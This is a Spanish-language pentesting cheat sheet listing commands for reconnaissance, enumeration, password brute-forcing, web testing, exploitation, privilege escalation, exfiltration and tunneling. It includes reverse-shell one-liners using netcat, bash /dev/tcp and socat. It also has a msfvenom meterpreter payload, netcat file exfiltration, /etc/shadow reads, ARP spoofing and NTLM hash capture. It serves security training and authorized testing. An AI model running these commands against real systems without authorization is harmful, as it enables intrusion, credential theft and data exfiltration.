Hoja de Comandos para Pentesting (Cheat Sheet)
Reconocimiento de Red
● whois <dominio>: Obtener información sobre un dominio.
● nslookup <dominio>: Realizar consultas DNS.
● dig <dominio>: Consultas DNS detalladas.
● ping <IP>: Comprobar si un host está activo.
● traceroute <IP>: Rastrear la ruta que toman los paquetes hacia un host.
● nmap -sC -sV -oN scan.txt <IP>: Escaneo de servicios y detección de
versiones.
● nmap -Pn -A <IP>: Escaneo agresivo sin ping.
● masscan -p1-65535 <IP> --rate 1000: Escaneo rápido de puertos.
● amass enum -d <dominio>: Enumeración avanzada de subdominios.
● theHarvester -d <dominio> -l 500 -b all: Recolectar correos, nombres y
hosts asociados a un dominio.
● shodan search <query>: Buscar activos vulnerables en Shodan.
Enumeración
● enum4linux -a <IP>: Enumerar recursos y usuarios en SMB.
● smbclient -L //<IP>: Listar recursos compartidos en SMB.
● ldapsearch -x -h <IP>: Enumerar información LDAP.
● rpcclient -U "" <IP>: Enumerar servicios RPC.
● ftp <IP>: Verificar si FTP anónimo está habilitado.
● curl -I <URL>: Obtener encabezados HTTP.
● whatweb <URL>: Identificar tecnologías utilizadas en un sitio web.
● snmpwalk -v 2c -c <comunidad> <IP>: Enumerar información SNMP.
Ataques de Contraseñas
● hydra -l <usuario> -P <diccionario> <IP> ssh: Fuerza bruta en SSH.
● medusa -u <usuario> -P <diccionario> -h <IP> -M smbnt: Fuerza
bruta en SMB.
● john --wordlist=<diccionario> <archivo_hash>: Descifrar hashes con
John the Ripper.
● hashcat -m <tipo_hash> <archivo_hash> <diccionario>: Descifrar
hashes con Hashcat.
● cewl -d 3 -m 5 -w <output.txt> <URL>: Generar diccionario personalizado
desde palabras encontradas en un sitio web.
Pruebas en Aplicaciones Web
● gobuster dir -u <URL> -w <diccionario>: Fuerza bruta de directorios.
● gobuster dns -d <dominio> -w <diccionario>: Fuerza bruta de
subdominios.
● nikto -h <URL>: Escaneo de vulnerabilidades en servidores web.
● wfuzz -c -z file,<diccionario> --hc 404 <URL>/FUZZ: Fuzzing de
directorios.
● sqlmap -u <URL> --dbs: Test de inyección SQL y listado de bases de datos.
● wpscan --url <URL>: Escaneo de sitios WordPress.
● burpsuite: Usar proxy para analizar y modificar solicitudes HTTP/S.
Explotación
● searchsploit <software>: Buscar exploits públicos.
● msfconsole: Iniciar Metasploit Framework.
○ use exploit/<ruta>: Seleccionar un exploit.
○ set RHOST <IP>: Establecer host remoto.
○ set LHOST <IP>: Establecer host local.
○ run: Ejecutar el exploit.
● python3 -m http.server <puerto>: Iniciar un servidor HTTP rápido.
● nc -e /bin/bash <IP> <puerto>: Crear una reverse shell (en el lado del
atacante).
● msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP>
LPORT=<puerto> -f exe > shell.exe: Crear un payload ejecutable.
Post-Explotación
● whoami: Identificar el usuario actual.
● hostname: Mostrar el nombre del host.
● id: Mostrar IDs de usuario y grupo.
● ifconfig o ip a: Mostrar interfaces de red.
● netstat -ano: Listar conexiones de red activas.
● cat /etc/passwd: Leer el archivo passwd.
● cat /etc/shadow: Leer contraseñas encriptadas (requiere root).
● find / -perm -4000 2>/dev/null: Buscar binarios con SUID.
● ps aux: Listar procesos en ejecución.
● crontab -l: Ver tareas programadas del cron.
Escalamiento de Privilegios
● sudo -l: Listar permisos sudo.
● gtfobins: Buscar binarios que permitan escalar privilegios.
● linpeas.sh: Usar LinPEAS para enumerar vectores de escalamiento.
● find / -type f -name "*.conf": Buscar archivos de configuración.
● exploit suggester: Usar Metasploit para encontrar exploits de escalamiento.
● pwndb: Buscar posibles filtraciones de credenciales asociadas a un dominio.
Exfiltración de Datos
● scp archivo.txt usuario@<IP>:/ruta/destino: Copiar un archivo de
manera segura.
● nc -lvp <puerto>: Configurar un listener para transferencia de archivos.
● tar czf - archivo.txt | nc <IP> <puerto>: Transferir un archivo usando
netcat.
● rsync -avz archivo.txt usuario@<IP>:/ruta/destino: Transferir datos
de forma eficiente.
Túneles y Redirección de Puertos
● ssh -L <puerto_local>:<host_remoto>:<puerto_remoto>
usuario@<IP>: Redirección de puerto local.
● ssh -R <puerto_remoto>:<host_local>:<puerto_local>
usuario@<IP>: Redirección de puerto remoto.
● ssh -D <puerto> usuario@<IP>: Proxy dinámico SOCKS.
● socat TCP-LISTEN:<puerto>,fork EXEC:"/bin/bash": Crear un shell
remoto.
Herramientas de Red
● tcpdump -i <interfaz>: Capturar paquetes en una interfaz.
● wireshark: Análisis de paquetes con GUI.
● ettercap -T -M arp:remote /<IP_objetivo>/ /<IP_puerta>/: Realizar
spoofing ARP.
● responder -I <interfaz>: Capturar hashes NTLM en la red.
Scripting y Automatización
● for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip | grep
"bytes from"; done: Ping sweep en una subred.
● python -c 'import pty; pty.spawn("/bin/bash")': Crear un TTY shell.
● bash -i >& /dev/tcp/<IP>/<puerto> 0>&1: Crear reverse shell en Bash.
Forense e Ingeniería Inversa
● strings <archivo>: Extraer cadenas imprimibles de un archivo.
● file <archivo>: Identificar el tipo de archivo.
● hexdump -C <archivo>: Ver el contenido de un archivo en hexadecimal.
● gdb <binario>: Depurar binarios.
● strace <comando>: Trazar llamadas al sistema y señales.
Comandos Comunes y Modificadores Útiles
● nmap:
○ -p-: Escanea todos los puertos (1-65535).
○ -sU: Escaneo de puertos UDP.
○ --script=<script>: Ejecuta scripts NSE (Network Security Scripts).
○ -T4: Acelera el escaneo (niveles de agresividad de 0 a 5).
● curl:
○ -X <método>: Especifica el método HTTP (GET, POST, etc.).
○ -d '<data>': Enviar datos en una solicitud POST.
○ -k: Ignorar errores de certificados SSL.
● find:
○ find / -name "<archivo>: Buscar un archivo por nombre.
○ -type d: Buscar solo directorios.
○ -exec <comando> {} \;: Ejecutar un comando sobre los resultados.
● grep:
○ grep -i <patrón>: Búsqueda sin distinción de mayúsculas/minúsculas.
○ grep -r <patrón> <directorio>: Búsqueda recursiva.
○ grep -v <patrón>: Excluir líneas que coincidan con el patrón.
● tar:
○ tar -czvf <archivo.tar.gz> <directorio>: Comprimir un
directorio.
○ tar -xzvf <archivo.tar.gz>: Extraer un archivo comprimido.